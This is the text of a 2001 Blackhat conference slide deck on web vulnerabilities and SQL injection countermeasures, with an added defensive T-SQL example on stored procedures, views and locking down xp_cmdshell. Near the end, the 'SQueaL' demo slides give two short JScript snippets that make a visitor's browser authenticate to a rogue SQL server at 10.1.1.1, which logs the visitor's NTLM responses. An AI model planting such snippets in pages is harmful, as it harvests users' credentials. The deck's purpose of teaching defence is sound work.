Welcome to Blackhat!
Blackhat Security Briefings
Amsterdam 2001
Timothy M. Mullen, AnchorIS.Com, Inc.
Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; thor@hammerofgod.com

Web Vulnerability and SQL Injection Countermeasures
Securing your servers from the most insidious of attacks:
The demands of the Global Marketplace have made web development more complex than ever. With customer demands and competitive influences, the functions our applications must be capable of performing constantly push our development into new areas.
Even with enterprise firewall solutions, hardened servers, and up-to-date web server software in place and properly configured, poor design methodology can leave our systems open for attack.
Session Overview
Part I:
∙ Vulnerabilities: Client-side HTML, URL Manipulation, SQL Injection
∙ Countermeasures: Input Validation, Data Sanitation, Variable Typing, Procedure Structure, Permissions and ACL's.
Part II:
∙ Live Demos highlighting real-world sites with different issues, participant involvement and brainstorming
∙ SQueaL Demo (SQueaL is an NTLM-logging rogue SQL server app)
Part I
Vulnerabilities
∙ Client-side HTML
∙ URL Manipulation
∙ SQL Injection
Countermeasures
∙ Implementation/Setup
∙ Input Validation
∙ Data Sanitation
∙ Variable Typing
∙ Procedure Structure
∙ Permissions and ACL's
Vulnerabilities – Lab Demos
Client-side HTML Issues
∙ Web Forms
∙ Input/Select controls
∙ Hidden Fields
URL Manipulation
∙ Editing the URL
∙ Session variables
∙ Cookies
SQL Injection
∙ The possibilities are endless!
Countermeasures – Lab Demos
Implementation and Setup
∙ ADODB Connection Strings and DSN's
∙ ODBC Error reporting
∙ Custom error pages
Countermeasures – Lab Demos
Input Validation
∙ Querystring count checking
∙ Data Type Validation
∙ Value/Length Checking
∙ Extents/Boundary Checking
∙ Host submission limits per unit of time
Countermeasures – Lab Demos
Data Sanitation
∙ REPLACE function
∙ RegExp function
∙ Custom functions / explicit declarations
Countermeasures – Lab Demos
Variable Typing
∙ Command object
∙ Parameter declaration
∙ Command type declaration
∙ Execute as methods
Countermeasures – Lab Demos
SQL Stored Procedure Structure
∙ Use stored procedures whenever possible
∙ Type cast variables
∙ Create and use Views as table sources
∙ Avoid "Select *" statements for performance as well as security
∙ sp_executeSQL procedure for ad hoc queries
Countermeasures – Lab Demos
Permissions and ACL's
∙ Open views, but lock down tables
∙ Use groups
∙ Lock down xp_cmdshell, xp_sendmail or remove
∙ SQL Service context
∙ Integrated/Mixed security
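A worked T-SQL example, added here and not from the deck, that ties the Stored Procedure Structure and Permissions slides together: a view as the only table source, typed parameters, sp_executesql for the one ad hoc clause, and a role that can read the view but not the table. It assumes the pubs sample database named in the deck's connection string, an existing login "webuser", and the constructed names vw_AuthorsPublic, usp_AuthorSearch and WebApp.

```sql
-- Assumed: the "pubs" sample database from the deck's connection string (authors table),
-- an existing login "webuser", and the constructed names vw_AuthorsPublic,
-- usp_AuthorSearch and WebApp. Not the deck's own code.
USE pubs
GO
-- The view is the only table source the web user ever sees; explicit columns, no "SELECT *"
CREATE VIEW dbo.vw_AuthorsPublic AS
SELECT au_id, au_lname, au_fname, state
FROM dbo.authors
WHERE contract = 1
GO
-- Typed parameters; the one ad hoc part (an optional filter) goes through sp_executesql
CREATE PROCEDURE dbo.usp_AuthorSearch
    @lname VARCHAR(40),
    @state CHAR(2) = NULL
AS
SET NOCOUNT ON
DECLARE @sql NVARCHAR(500)
SET @sql = N'SELECT au_id, au_lname, au_fname, state '
         + N'FROM dbo.vw_AuthorsPublic WHERE au_lname LIKE @lname'
IF @state IS NOT NULL
    SET @sql = @sql + N' AND state = @state'   -- the statement's shape varies, never its values
EXEC sp_executesql @sql,
     N'@lname VARCHAR(40), @state CHAR(2)',
     @lname = @lname, @state = @state
-- Contrast: EXEC('... WHERE au_lname = ''' + @lname + '''') would let the value
-- rewrite the statement; sp_executesql passes it as a value, whatever it contains
GO
-- Permissions: a role for the web application, the view opened, the table locked down.
-- With view and table both owned by dbo, ownership chaining means the DENY on the
-- table is not checked when the role reads through the view or the procedure.
EXEC sp_addrole 'WebApp'
EXEC sp_grantdbaccess 'webuser', 'webuser'
EXEC sp_addrolemember 'WebApp', 'webuser'
GRANT SELECT ON dbo.vw_AuthorsPublic TO WebApp
GRANT EXECUTE ON dbo.usp_AuthorSearch TO WebApp
DENY SELECT, INSERT, UPDATE, DELETE ON dbo.authors TO WebApp
GO
USE master
GO
-- Extended procedures: take them away from public, or remove them outright
REVOKE EXECUTE ON xp_cmdshell FROM public
REVOKE EXECUTE ON xp_sendmail FROM public
-- EXEC sp_dropextendedproc 'xp_cmdshell'   -- removal, when nothing legitimate needs it
GO
```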
Web Vulnerability and SQL Injection Countermeasures
Part I Concluded
15 Minute Break

Web Vulnerability and SQL Injection Countermeasures
Welcome Back!
Part II
Live Web Demos and Feedback
∙ Expose potentially insecure implementations of web applications
∙ Discuss potential vulnerabilities and exploits
∙ Mitigation and Prevention
SQUeaL Demo: Grabbing NTLM responses from unsuspecting users
Web Vulnerabilities – Live Demos
Real-world web application issues and feedback
Web Vulnerabilities – Live Demos
SQUeaL: NTLM-logging rogue SQL Server
∙ Linux server application based on DilDog's "TalkNTLM" code
∙ Waits for TCP/IP connection on 1433, and attempts to authenticate via NTLM
∙ Logs domain, username, and NTLM response
Web Vulnerabilities – Live Demos
SQUeaL: Getting them to connect
∙ ADODB Connection (Lame)

    // JScript, run in the browser as an ActiveX object. Integrated Security=SSPI
    // makes the client authenticate to the Data Source with its Windows credentials.
    conn = new ActiveXObject("ADODB.Connection");
    conn.ConnectionString = 'Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=pubs;Data Source=10.1.1.1;Network Library=dbnetlib';
    conn.Open();
Web Vulnerability and SQL Injection Countermeasures
SQUeaL: Getting them to connect
∙ DBNETLIB (Not so lame)

    // JScript, SQL Namespace (SQL-NS) object. Trusted_Connection=Yes again sends the
    // client's Windows credentials; the 2 selects a server root object.
    ns = new ActiveXObject("SQLNS.SQLNamespace");
    ns.Initialize("Grabber", 2, "Server=10.1.1.1;Trusted_Connection=Yes;Network Library=dbnetlib.dll");
Web Vulnerability and SQL Injection Countermeasures
Closing Remarks

THANK YOU!
Additional Resources:
http://www.hammerofgod.com
email: thor@hammerofgod.com
http://www.securityfocus.com
http://www.sqlsecurity.com
http://heap.nologin.net/aspsec.html
http://security.devx.com/bestdefense/default.asp
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/database/database.asp